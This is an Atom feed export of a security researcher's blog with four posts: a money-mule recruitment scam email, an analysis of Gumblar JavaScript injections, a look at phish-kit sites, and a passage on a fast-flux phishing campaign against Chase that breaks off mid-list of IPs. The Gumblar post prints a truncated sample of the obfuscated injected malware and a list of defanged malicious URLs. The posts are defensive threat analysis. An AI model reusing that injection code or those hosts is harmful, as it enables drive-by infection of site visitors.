<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1174024596384276838</id><updated>2011-07-07T16:57:55.600-07:00</updated><category term='heuristic'/><category term='phishing'/><category term='gumblar'/><category term='rock phish'/><category term='chase'/><category term='javascript'/><category term='research'/><category term='fast-flux'/><category term='compromised'/><category term='kaspersky'/><category term='brain'/><category term='obfuscated'/><category term='scam'/><category term='password'/><category term='fraud'/><title type='text'>Stuff</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://michajp.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1174024596384276838/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://michajp.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>mimojapan</name><uri>http://www.blogger.com/profile/09620575355384006452</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/_GnPGhaRiJaY/StMwkCT2YLI/AAAAAAAAA-s/vZmUu5LYXiA/S220/mimo09b.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>4</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1174024596384276838.post-7455994311961804587</id><published>2010-07-05T03:14:00.000-07:00</published><updated>2010-07-08T00:35:01.677-07:00</updated><title type='text'>Mules for Japan</title><content type='html'>What just landed in my inbox:&lt;br /&gt;&lt;br /&gt;Subject: [!! SPAM] BE OUR REPRISENTATIVE (sic)&lt;br /&gt;&lt;br /&gt;Body:&lt;br /&gt;---snip---&lt;br /&gt;HI,&lt;br /&gt;&lt;br /&gt;I represent  TEIKOKU OIL AND GAS COMPANY based in TOKYO,japan our company deals on  oil and gas  which we sell,import and also exports.We are searching for trust worthy administrative officer who can help us establish a medium of getting to our customers in Europe and America as well as making payments through you as our administrative officer.The international money transfer tax for legal entities (companies) in japan is 25%, whereas for the individual it is only 7%.There is no sense for us to work this way, while tax for international money transfer made by a private individual is 7% .&lt;br /&gt;&lt;br /&gt;We are willing to pay you and the lawyer 15% for every payment received by you from our clients who makes payment through you.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Teikoku _Oil_ gas _company&lt;br /&gt;1- 31-10, Hatagaya, Shibuya-ku&lt;br /&gt;151-8565, Tokyo&lt;br /&gt;JAPAN&lt;br /&gt;email:teikoku*******@hotmail.com&lt;br /&gt;Phone:    +81-3-3466-123&lt;br /&gt;Fax:        +81-3-3468-351&lt;br /&gt;Note that, as our administrative officer, you and your lawyer will receive 10% of whatever amount you receive for the company and the balance will be paid to our company. Please, to facilitate the conclusion of this transaction if accepted, do send me the following:&lt;br /&gt;&lt;br /&gt;(1)Your full names.&lt;br /&gt;(2)Contact address.&lt;br /&gt;(3)Age/Sex.&lt;br /&gt;(4)Mailing address.&lt;br /&gt;(5)State and Country.&lt;br /&gt;(6)Telephone number and fax number.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;to our email ; teikoku******@hotmail.com&lt;br /&gt;&lt;br /&gt;Thank you for your time.&lt;br /&gt;your Respectfully,&lt;br /&gt;&amp;nbsp;Mr kiko higashida&lt;br /&gt;REGIONAL MANAGER&lt;br /&gt;---snap---&lt;br /&gt;&lt;br /&gt;Obviously this mail has nothing to do with the real TEIKOKU OIL CO. LTD but is an attempt to recruit some unsuspecting user(s) for fraudulent activity - relay money or goods to a cybercriminal, mainly Phishers or Malware spreaders.&lt;br /&gt;&lt;br /&gt;Interestingly a quick google search revealed that a similar scheme abusing this companies name was already used back in 2007.&lt;br /&gt;&lt;br /&gt;From mail headers we could see that the cybercriminal(s) registered an account at a Japanese provider for sending emails. The mail which we received was sent by somebody in Italy - the same IP address was used once at 28/04/2010 to login to 'YouTribe.net' with the nick 'ninetto'.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Don't be fooled by such offers, they are known to end sad.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1174024596384276838-7455994311961804587?l=michajp.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://michajp.blogspot.com/feeds/7455994311961804587/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1174024596384276838&amp;postID=7455994311961804587' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1174024596384276838/posts/default/7455994311961804587'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1174024596384276838/posts/default/7455994311961804587'/><link rel='alternate' type='text/html' href='http://michajp.blogspot.com/2010/07/mules-for-japan.html' title='Mules for Japan'/><author><name>mimojapan</name><uri>http://www.blogger.com/profile/09620575355384006452</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/_GnPGhaRiJaY/StMwkCT2YLI/AAAAAAAAA-s/vZmUu5LYXiA/S220/mimo09b.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1174024596384276838.post-2193555002509008226</id><published>2009-10-19T03:39:00.001-07:00</published><updated>2009-10-31T07:56:48.221-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='javascript'/><category scheme='http://www.blogger.com/atom/ns#' term='heuristic'/><category scheme='http://www.blogger.com/atom/ns#' term='compromised'/><category scheme='http://www.blogger.com/atom/ns#' term='password'/><category scheme='http://www.blogger.com/atom/ns#' term='gumblar'/><category scheme='http://www.blogger.com/atom/ns#' term='obfuscated'/><title type='text'>Injected URLs of JS malware</title><content type='html'>While checking a list of compromised websites which were injected with 'gumblar.a' code in the past, I discovered that about 50% of them now contained additional danger in form of malicious URLs.&lt;br /&gt;Following CLSIDs were found in the deobfuscated&amp;nbsp;code:&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;{BD96C556-65A3-11D0-983A-00C04FC29E30}&lt;br /&gt;{BD96C556-65A3-11D0-983A-00C04FC29E36}&lt;br /&gt;{AB9BCEDD-EC7E-47E1-9322-D4A210617116}&lt;br /&gt;{0006F033-0000-0000-C000-000000000046}&lt;br /&gt;{0006F03A-0000-0000-C000-000000000046}&lt;br /&gt;{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}&lt;br /&gt;{6414512B-B978-451D-A0D8-FCFDF33E833C}&lt;br /&gt;{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}&lt;br /&gt;{06723E09-F4C2-43c8-8358-09FCD1DB0766}&lt;br /&gt;{639F725F-1B2D-4831-A9FD-874847682010}&lt;br /&gt;{BA018599-1DB3-44f9-83B4-461454C84BF8}&lt;br /&gt;{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}&lt;br /&gt;{E8CCCDDF-CA28-496b-B050-6C07C962476B}&lt;br /&gt;&lt;br /&gt;Seems not a very new set of attacks but the form in which they try to accomplish it is quite interesting because currently (16 Oct 09)almost no AV vendor participating at VirusTotal seems to detect the malicious scripts even by heuristics. As a matter of fact the pushed code is created "on the fly" and different at each get. Some of the malicious URLs (last update Wed Oct 21 03:08:37 UTC):&lt;br /&gt;&lt;br /&gt;hxxp://rapidsharecrawler.com/utils/images/tmp/bg3.php&lt;br /&gt;hxxp://publicnet.ca/Templates/faq.php&lt;br /&gt;hxxp://1st-broker.ru/thehun/&lt;br /&gt;hxxp://achtbanen.org/images/b-one-default.php&lt;br /&gt;hxxp://gemus.pl/db/ftpchk3.php&lt;br /&gt;hxxp://mashaei.ir/AWStats/admin.php&lt;br /&gt;hxxp://ajkcas.com/_vti_cnf/ad.php&lt;br /&gt;hxxp://myrussia.kz/includes/regions.php&lt;br /&gt;hxxp://npnonline.in/includes/indexnew.php&lt;br /&gt;hxxp://sm-komplekt.ru/images/montag_in.php&lt;br /&gt;hxxp://orkutmasti.com/tempimage/viewsongs.php&lt;br /&gt;hxxp://bzb.de/user_img/test.php&lt;br /&gt;hxxp://elpotrero.com.ar/seleccion/Maradona-Marsella.php&lt;br /&gt;hxxp://kingofbelgrade.com/eng/pngfix.php&lt;br /&gt;hxxp://agag44.com/vb/ardn.php&lt;br /&gt;hxxp://epiphyte.ru/home/db1900b.mysql.php&lt;br /&gt;hxxp://ebib.info/cache/globals.php&lt;br /&gt;hxxp://betabalon.com.tr/catering/videos.php&lt;br /&gt;hxxp://doctor-jade.ru/image/collor1.php&lt;br /&gt;hxxp://infobyte.com.tr/yyy/steffrect.php&lt;br /&gt;hxxp://firelogltd.co.uk/_vti_bin/index.php&lt;br /&gt;hxxp://hamnkrog.se/xmlrpc/LICENSE.php&lt;br /&gt;hxxp://lmdl.gamesquality.com/web_files/soporte.php&lt;br /&gt;hxxp://tne.tourskorea.com/newEvent/Timages/left_event.php&lt;br /&gt;hxxp://rawalrohi.com/images/ART.php&lt;br /&gt;hxxp://internetravel.ru/downloads/wp-feed.php&lt;br /&gt;hxxp://tacticz.be/maarten/news.php&lt;br /&gt;hxxp://borsalita.ru/g/index.php&lt;br /&gt;hxxp://driving-177.ru/img/pricelist_clip_image002_0001.php&lt;br /&gt;&lt;br /&gt;By now I have collected 91 of such 'new gumblar'-sites.&lt;br /&gt;Visiting any of these does push code of average 30KB while subsequent attempts will only push about 3 KB. In most cases these URLs were just written after the closing head tag and if you find these in any files of your web site, it's time to change passwords, clean up, etc.&lt;br /&gt;These pages try to download PDF, SWF and EXE files to the victim machine.&lt;br /&gt;&lt;br /&gt;Sample code:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;//&lt; script &gt;&lt;br /&gt;&lt;p&gt;jBbld=24;if(alert)jBbld='';s8a=unescape('%'+jBbld);&lt;/P&gt;&lt;p&gt;xIUH='B64&lt;6fcW75mW65&lt;6et.wW72iteB28B22B3cB64iv &lt;73tyle&lt;3dL5cL22posiL74ionL3aabsol&lt;75teL3b&lt;20left&lt;3aW2d1&lt;3000pw78w3b tB6fp&lt;3aL2d1L3000px&lt;3bB5c&lt;22&lt;3e&lt;22)W3bfunct&lt;69on b6(t)B7bvW61B72 c1L2cc2,c3,B651B2ce&lt;32,e3,B654B2cjL3d0,d&lt;3d&lt;22&lt;22,k&lt;3dB22JW6fZp+B45A6rW68vL43sW58B56DL4dc&lt;65&lt;77O45btS9ilL4cL57kqL55L38W66mR7xgL2fj0W4bTB51&lt;42N&lt;64yL75L32L3dazG3HnY&lt;49PW46L31B22W3bL64oB7be&lt;31W3dW6b.&lt;69nde&lt;78W4ff(tW2echaB72At(+SW74riW6eg.fB72oL6dCharCode(W63&lt;33)&lt;3bB7dwhile&lt;28jW3ct.L6cL65ngtW68)&lt;3bL72W65tB75B72nB20dW3bW7ddoW63umentB2ewL72L69te&lt;28W22L3cscriL70t languL61&lt;67eL3dB56L42ScriptB3eSub s1(e,fW6e,dt)L3aW4fn&lt;20ErB72orL20W52esB75me Ne&lt;78tL3as1L3d0B3aW22L2bB27SW65&lt;74 &lt;6bW3d&lt;65.CrW65a&lt;74eTextFile(fnL2cT&lt;52UE)&lt;3aif &lt;45rr&lt;3e0 &lt;63B3bvar&lt;20r,a,b,d,f,g,hL3brL3dnuW6cl&lt;3baW3dW22tryL7brB3doW2eW22&lt;3bW62B3dW22L43&lt;72W65ateW4fbjeW63t(W6e&lt;22B3bdL3d&lt;22)L7dcW61tch(&lt;65)L7b&lt;22B3bB66W3dL22GetL4fbj&lt;65ct(&lt;22B3bg&lt;3d&lt;27,B22W22B27B3bhW3dd+aW3bevaB6c(W61+b+h+&lt;62+g+B68+b+g+g+h+fB2bL27&lt;22B22,W6eL27+h+f+L27nL27+g+h+f+B27n&lt;27+d+L27W7d&lt;7dL7dB7dB7dW7dB27)W3bB72eB74urnL20rW7dfuB6ecL74W69W6fn&lt;20f4(d,c)&lt;7btryB7bW64B5bdB2elengthW5dL3dcB3bB7dL63atcL68B28e)&lt;7bB7d&lt;7dL66uB6ectioL6e f2(&lt;6f,tL2cnL2cd)L7bfW6fr(var iL3dnB2eleL6eg&lt;74hW2d1W3bi&lt;3e&lt;3d0B3bi&lt;2dB2d)L7bif&lt;28W6f&lt;29tryB7bo.TypeL3d2B3bo.&lt;4doW64W65&lt;3d3&lt;3bo.B4fpenW28)W3bo.&lt;43hars&lt;65t&lt;3dW27W49SOB2d8859&lt;2d1B27&lt;3bW6f.W57riteTexL74(L64)W3bB6f.SaW76&lt;65TL6fF&lt;69leB28nW5b&lt;69W5d,B32)L3bB6fW2eClose()&lt;3bre&lt;74urnB20nW5biB5dL3bL7dcatch(e)&lt;7bW7d&lt;69W66(W74B26L26wiB6edowL2eL73B31&lt;26W26s1(tB2cnL5bL69&lt;5d,B64L29)reL74urW6eB20nB5bB69L5d&lt;3bL7dretu&lt;72nW200B3b&lt;7dfunW63tion f3(&lt;29&lt;7btry&lt;7bvar ......&lt;/P&gt;&lt;/BLOCKQUOTE&gt;&lt; /script &gt;&lt;br /&gt;&lt;br /&gt;Update Mon Oct 31 21:05 JST 2009:&lt;br /&gt;Total discovered injected sites hosted in Japan: 550+&lt;br /&gt;Out of these 400+ are currently still injected.&lt;br /&gt;Time to send out some more mails.&lt;br /&gt;Biggest injected spot is/was a Persian Blog site.&lt;br /&gt;&lt;br /&gt;Other stats:&lt;br /&gt;Total hits - 443748&lt;br /&gt;Biggest spreader in JP was a famous 'jinja' (shrine) site with at least 11037 hits.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1174024596384276838-2193555002509008226?l=michajp.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://michajp.blogspot.com/feeds/2193555002509008226/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1174024596384276838&amp;postID=2193555002509008226' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1174024596384276838/posts/default/2193555002509008226'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1174024596384276838/posts/default/2193555002509008226'/><link rel='alternate' type='text/html' href='http://michajp.blogspot.com/2009/10/injected-urls-of-js-malware.html' title='Injected URLs of JS malware'/><author><name>mimojapan</name><uri>http://www.blogger.com/profile/09620575355384006452</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/_GnPGhaRiJaY/StMwkCT2YLI/AAAAAAAAA-s/vZmUu5LYXiA/S220/mimo09b.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1174024596384276838.post-122036141194409152</id><published>2009-10-11T00:21:00.000-07:00</published><updated>2009-10-11T05:44:37.859-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='phishing'/><category scheme='http://www.blogger.com/atom/ns#' term='research'/><category scheme='http://www.blogger.com/atom/ns#' term='scam'/><category scheme='http://www.blogger.com/atom/ns#' term='brain'/><category scheme='http://www.blogger.com/atom/ns#' term='fraud'/><title type='text'>Phishing for Dummies</title><content type='html'>There was a phishing mail in my inbox today which caught my interest and resulted in some hours of research. The result was discovery of a bunch of web sites distributing 'Phish Kits' for free - ready to use packages. Some screen captures of my findings:&lt;br /&gt;&lt;br /&gt;The first one&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_GnPGhaRiJaY/StGN2GKOafI/AAAAAAAAA9o/lDgLXAIflN0/s1600-h/scam-ed.PNG" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5391246189445147122" src="http://2.bp.blogspot.com/_GnPGhaRiJaY/StGN2GKOafI/AAAAAAAAA9o/lDgLXAIflN0/s400/scam-ed.PNG" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;... Then searching some more&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;a href="http://4.bp.blogspot.com/_GnPGhaRiJaY/StHHla8vFfI/AAAAAAAAA-Y/DKsDra4jBFs/s1600-h/sc4m-101009-ed.PNG" imageanchor="1" style="cssfloat: left; margin-left: 1em; margin-right: 1em;"&gt;&lt;img $r="true" border="0" src="http://4.bp.blogspot.com/_GnPGhaRiJaY/StHHla8vFfI/AAAAAAAAA-Y/DKsDra4jBFs/s400/sc4m-101009-ed.PNG" /&gt;&lt;/a&gt;&lt;br /&gt;... and more&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_GnPGhaRiJaY/StHKB238jjI/AAAAAAAAA-g/mVtz27u7-2U/s1600-h/jail-101009-ed.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img $r="true" border="0" src="http://3.bp.blogspot.com/_GnPGhaRiJaY/StHKB238jjI/AAAAAAAAA-g/mVtz27u7-2U/s400/jail-101009-ed.PNG" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;... and more&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5391246617867365762" src="http://2.bp.blogspot.com/_GnPGhaRiJaY/StGOPCKCrYI/AAAAAAAAA-A/r0xufjXtBPE/s400/top-101009-ed.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;... even more&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5391247573745655954" src="http://1.bp.blogspot.com/_GnPGhaRiJaY/StGPGrFL4JI/AAAAAAAAA-Q/EaaXV4pB3js/s400/sp4m-101009-ed.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;... and finally&lt;br /&gt;&lt;br /&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5391247502545760786" src="http://1.bp.blogspot.com/_GnPGhaRiJaY/StGPCh1zshI/AAAAAAAAA-I/j_ROqLYQqYc/s400/sc4m-101009b-ed.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;Most of these sites also point to additional pages containing malicious tools for mass mailing, doing certain kind of scanning for vulnerable hosts, ddos attacks and other nasty things.&lt;br /&gt;Close observation of these sites reveals similarities and that is no wonder because they are all created by the same criminal(s). The provided phish kits do contain PHP scripts which will send the harvested data to the creator in addition to the malicious user who tries to use them.&lt;br /&gt;This scheme is used since more than a year and in the past several similar sites have appeared and were taken down eventually:&lt;br /&gt;&lt;br /&gt;scam-pags.net&lt;br /&gt;scam4u.com&lt;br /&gt;thebadboys.org&lt;br /&gt;freescam.webobo.com&lt;br /&gt;online-scams.net&lt;br /&gt;scam7.com&lt;br /&gt;www .scam-page.fr&lt;br /&gt;www .mafia8doc.com&lt;br /&gt;scams-mafia.com&lt;br /&gt;worldpowerz.com&lt;br /&gt;sakhsookh.100webspace.net&lt;br /&gt;&lt;br /&gt;Some more technical details might make it into this post soon.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1174024596384276838-122036141194409152?l=michajp.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://michajp.blogspot.com/feeds/122036141194409152/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1174024596384276838&amp;postID=122036141194409152' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1174024596384276838/posts/default/122036141194409152'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1174024596384276838/posts/default/122036141194409152'/><link rel='alternate' type='text/html' href='http://michajp.blogspot.com/2009/10/phishing-for-dummies.html' title='Phishing for Dummies'/><author><name>mimojapan</name><uri>http://www.blogger.com/profile/09620575355384006452</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/_GnPGhaRiJaY/StMwkCT2YLI/AAAAAAAAA-s/vZmUu5LYXiA/S220/mimo09b.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_GnPGhaRiJaY/StGN2GKOafI/AAAAAAAAA9o/lDgLXAIflN0/s72-c/scam-ed.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1174024596384276838.post-1338831291638517698</id><published>2008-12-26T22:18:00.000-08:00</published><updated>2008-12-31T21:32:34.474-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='phishing'/><category scheme='http://www.blogger.com/atom/ns#' term='fast-flux'/><category scheme='http://www.blogger.com/atom/ns#' term='kaspersky'/><category scheme='http://www.blogger.com/atom/ns#' term='rock phish'/><category scheme='http://www.blogger.com/atom/ns#' term='chase'/><title type='text'>Phishing Attack on Chase (DEC 2008)</title><content type='html'>&lt;p&gt;Good day!&lt;/p&gt;&lt;p&gt;Most of the christian world is celebrating Christmas and also elsewhere, people are enjoying a short vacation before jumping into the Year 2009. As always at such seasons - it is also an &lt;em&gt;opportunity&lt;/em&gt; for criminals who take advantage of the fact that CERTs, abuse desks, ISPs and many IT security related companies might be 'a bit' slow in response.&lt;/p&gt;&lt;p&gt;Beginning at 2008-12-25 18:46:07 a huge spam wave of phishing URLs targeting "JPMorgan Chase &amp;amp; Co" was observed. At time of writing we have collected no less than 11209 unique URLs like the following:&lt;/p&gt;&lt;p&gt;hxxp://chaseonline.chase.com.dlls-to.com/Secure/webform/OSL.aspx?LOB=&lt;random&gt;&lt;/p&gt;&lt;p&gt;The domains used for this attack are:&lt;/p&gt;&lt;p&gt;dll-isapi.com&lt;br /&gt;dlls-to.bz&lt;br /&gt;dlls-to.com&lt;br /&gt;dlls-to.mn&lt;br /&gt;dlls-to.name&lt;br /&gt;file-07i.com&lt;br /&gt;file-id011.com&lt;br /&gt;file-id017.com&lt;br /&gt;file-p0174.eu&lt;br /&gt;filestack-01.bz&lt;br /&gt;filestack-01.com&lt;br /&gt;filestack-01.co.in&lt;br /&gt;filestack-01.name&lt;br /&gt;filestack-01.net&lt;br /&gt;filestack-01.org&lt;br /&gt;idr-to7.cc&lt;br /&gt;idr-to7.com&lt;br /&gt;idr-to7.mobi&lt;br /&gt;idr-to7.net&lt;br /&gt;idr-to7.us&lt;br /&gt;mode-d021.com&lt;br /&gt;modedl-id01.com&lt;br /&gt;userdl-isapi000071.com&lt;br /&gt;userdl-isapi000071.org&lt;br /&gt;userdl-isapi000073.org&lt;br /&gt;userdl-isapi000075.org&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;These domains are resolving to 15 IPs at a time, three of them are changing each 30 minutes. Total IP pool consists of the following 265 addresses :&lt;/p&gt;&lt;p&gt;IP Address         -    Country&lt;/p&gt;&lt;p&gt;113.131.224.36 Korea, Republic Of 114.145.62.47 Japan 114.164.132.216 Japan &lt;br /&gt;114.182.11.127 Japan &lt;br /&gt;114.182.58.206 Japan &lt;br /&gt;114.201.27.115 Korea, Republic Of &lt;br /&gt;114.74.219.117 Australia &lt;br /&gt;118.15.181.227 Japan &lt;br /&gt;118.19.70.69 Japan &lt;br /&gt;118.8.122.197 Japan &lt;br /&gt;12.202.1.12 USA - New York &lt;br /&gt;12.202.7.201 USA - New York &lt;br /&gt;121.113.181.142 Japan &lt;br /&gt;121.113.182.244 Japan &lt;br /&gt;172.131.180.173 USA - Virginia &lt;br /&gt;172.162.2.190 USA - Virginia &lt;br /&gt;172.162.31.108 USA - Virginia &lt;br /&gt;173.21.75.7 USA - New York &lt;br /&gt;193.39.73.14 Romania &lt;br /&gt;201.233.114.143 Colombia &lt;br /&gt;203.128.184.164 Korea, Republic Of &lt;br /&gt;203.128.184.36 Korea, Republic Of &lt;br /&gt;209.127.20.20 USA - California &lt;br /&gt;210.249.74.115 Japan &lt;br /&gt;211.128.182.235 Japan &lt;br /&gt;211.128.182.40 Japan &lt;br /&gt;212.129.111.29 Russian Federation &lt;br /&gt;212.152.45.193 Russian Federation &lt;br /&gt;216.20.143.167 USA - West Virginia &lt;br /&gt;218.238.4.111 Korea, Republic Of &lt;br /&gt;218.44.41.132 Japan &lt;br /&gt;219.110.78.126 Japan &lt;br /&gt;219.126.121.249 Japan &lt;br /&gt;219.126.123.144 Japan &lt;br /&gt;220.109.1.62 Japan &lt;br /&gt;220.109.147.167 Japan &lt;br /&gt;220.148.160.212 Japan &lt;br /&gt;220.148.162.250 Japan &lt;br /&gt;220.148.163.182 Japan &lt;br /&gt;220.221.18.140 Japan &lt;br /&gt;222.150.156.30 Japan &lt;br /&gt;24.136.176.91 USA - Georgia &lt;br /&gt;24.136.214.30 USA - Georgia &lt;br /&gt;24.148.132.49 USA - Georgia &lt;br /&gt;24.197.136.101 USA - Missouri &lt;br /&gt;24.197.136.96 USA - Missouri &lt;br /&gt;24.31.140.216 USA - Virginia &lt;br /&gt;24.34.244.95 USA - New Jersey &lt;br /&gt;58.176.9.74 Hong Kong &lt;br /&gt;58.190.43.53 Japan &lt;br /&gt;58.89.120.228 Japan &lt;br /&gt;59.28.212.203 Korea, Republic Of &lt;br /&gt;60.43.10.44 Japan &lt;br /&gt;62.143.26.211 Germany &lt;br /&gt;62.31.243.71 United Kingdom &lt;br /&gt;62.42.80.67 Spain &lt;br /&gt;62.57.222.4 Spain &lt;br /&gt;65.39.139.81 USA - New York &lt;br /&gt;65.81.151.81 USA - Georgia &lt;br /&gt;66.168.183.107 USA - Missouri &lt;br /&gt;66.30.132.23 USA - New Jersey &lt;br /&gt;67.135.130.48 USA - Colorado &lt;br /&gt;67.172.60.164 USA - New Jersey &lt;br /&gt;68.122.80.105 USA - California &lt;br /&gt;68.179.138.95 USA - Indiana &lt;br /&gt;68.255.5.42 USA - Illinois &lt;br /&gt;68.40.193.72 USA - New Jersey &lt;br /&gt;68.51.164.175 USA - New Jersey &lt;br /&gt;68.60.29.213 USA - New Jersey &lt;br /&gt;68.72.113.78 USA - Texas &lt;br /&gt;68.72.114.224 USA - Texas &lt;br /&gt;68.72.128.182 USA - Texas &lt;br /&gt;68.72.131.62 USA - Texas &lt;br /&gt;68.72.134.5 USA - Texas &lt;br /&gt;68.72.142.212 USA - Texas &lt;br /&gt;68.72.143.122 USA - Texas &lt;br /&gt;69.14.236.16 USA - Illinois &lt;br /&gt;69.148.198.52 USA - Texas &lt;br /&gt;69.149.57.104 USA - Texas &lt;br /&gt;69.149.59.247 USA - Texas &lt;br /&gt;69.150.75.115 USA - Texas &lt;br /&gt;69.152.229.233 USA - Texas &lt;br /&gt;69.154.246.1 USA - Texas &lt;br /&gt;69.155.130.228 USA - Texas &lt;br /&gt;69.155.143.252 USA - Texas &lt;br /&gt;69.84.99.133 USA - Florida &lt;br /&gt;70.121.191.48 USA - Virginia &lt;br /&gt;70.129.133.198 USA - Texas &lt;br /&gt;70.133.4.18 USA - Texas &lt;br /&gt;70.141.208.193 USA - Texas &lt;br /&gt;70.235.120.122 USA - Texas &lt;br /&gt;70.242.184.253 USA - Texas &lt;br /&gt;70.242.185.195 USA - Texas &lt;br /&gt;70.244.113.250 USA - Texas &lt;br /&gt;70.248.179.225 USA - Texas &lt;br /&gt;70.254.87.142 USA - Texas &lt;br /&gt;71.113.148.4 USA - Virginia &lt;br /&gt;71.113.158.101 USA - Virginia &lt;br /&gt;71.113.195.107 USA - Virginia &lt;br /&gt;71.113.203.160 USA - Virginia &lt;br /&gt;71.137.224.162 USA - California &lt;br /&gt;71.143.155.183 USA - Texas &lt;br /&gt;71.205.98.16 USA - New Jersey &lt;br /&gt;71.227.122.14 USA - New Jersey &lt;br /&gt;71.230.155.12 USA - New Jersey &lt;br /&gt;71.234.16.79 USA - New Jersey &lt;br /&gt;71.62.75.72 USA - New Jersey &lt;br /&gt;72.229.123.166 USA - Virginia &lt;br /&gt;72.253.196.243 USA - Hawaii &lt;br /&gt;74.65.132.241 USA - Virginia &lt;br /&gt;75.19.121.53 USA - Texas &lt;br /&gt;75.19.37.186 USA - Texas &lt;br /&gt;75.250.122.98 USA - New Jersey &lt;br /&gt;75.32.104.233 USA - Texas &lt;br /&gt;75.32.185.47 USA - Texas &lt;br /&gt;75.32.187.159 USA - Texas &lt;br /&gt;75.32.187.225 USA - Texas &lt;br /&gt;75.34.153.143 USA - Texas &lt;br /&gt;75.45.176.164 USA - Texas &lt;br /&gt;75.49.81.174 USA - Texas &lt;br /&gt;75.58.247.185 USA - Texas &lt;br /&gt;75.62.113.92 USA - Texas &lt;br /&gt;75.63.170.53 USA - Texas &lt;br /&gt;75.69.200.16 USA - New Jersey &lt;br /&gt;75.74.26.103 USA - New Jersey &lt;br /&gt;76.11.157.39 USA - Missouri &lt;br /&gt;76.112.122.216 USA - New Jersey &lt;br /&gt;76.119.221.197 USA - New Jersey &lt;br /&gt;76.202.231.201 USA - Texas &lt;br /&gt;76.203.25.6 USA - Texas &lt;br /&gt;76.205.66.56 USA - Texas &lt;br /&gt;76.205.88.196 USA - Texas &lt;br /&gt;76.211.16.24 USA - Texas &lt;br /&gt;76.226.133.78 USA - Texas &lt;br /&gt;76.226.144.124 USA - Texas &lt;br /&gt;76.226.171.21 USA - 